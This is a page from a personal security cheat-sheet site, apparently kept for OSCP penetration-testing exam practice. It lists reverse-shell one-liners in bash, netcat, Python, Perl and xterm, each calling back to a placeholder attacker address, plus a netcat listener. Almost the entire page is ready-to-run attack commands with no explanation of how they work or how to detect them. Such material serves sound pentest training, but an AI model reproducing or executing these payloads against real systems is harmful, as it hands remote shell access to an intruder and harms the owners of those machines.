📖
Jacob Shodd
  • The Hitchhiker's Guide to Random Knowledge
  • Cheat Sheets
    • Security
      • File Transferring
      • Reverse Shells
      • Password Attacks
      • Enumeration
      • One Liners
  • Writeups
    • Hack The Box
      • Bashed
      • Beep
      • Blue
      • Jerry
      • Lame
      • Legacy
      • Nibbles
      • Shocker
    • Over The Wire
      • Bandit
      • Natas
  • /dev/random
    • GoBot
    • Resume
Powered by GitBook
On this page
  • Catching Reverse Shells
  • Using Tools Present

Was this helpful?

  1. Cheat Sheets
  2. Security

Reverse Shells

Catching Reverse Shells

  • Because metasploit usage is limited in the OSCP exam, we will stick to basic NetCat receivers

nc -nvlp 31337

Using Tools Present

  • Bash

bash -i >& /dev/tcp/10.10.10.10/31337 0>&1
  • Netcat without -e flag

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 31337 >/tmp/f
  • Netcat with -e flag

nc -e /bin/bash 10.10.10.10 31337
  • Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Perl

perl -e 'use Socket;$i="10.10.10.10";$p=31337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Xterm

#On target system
xterm -display 10.10.10.10:1

#On Kali
Xnest :1
xhost +<targetip>
PreviousFile TransferringNextPassword Attacks

Last updated 3 years ago

Was this helpful?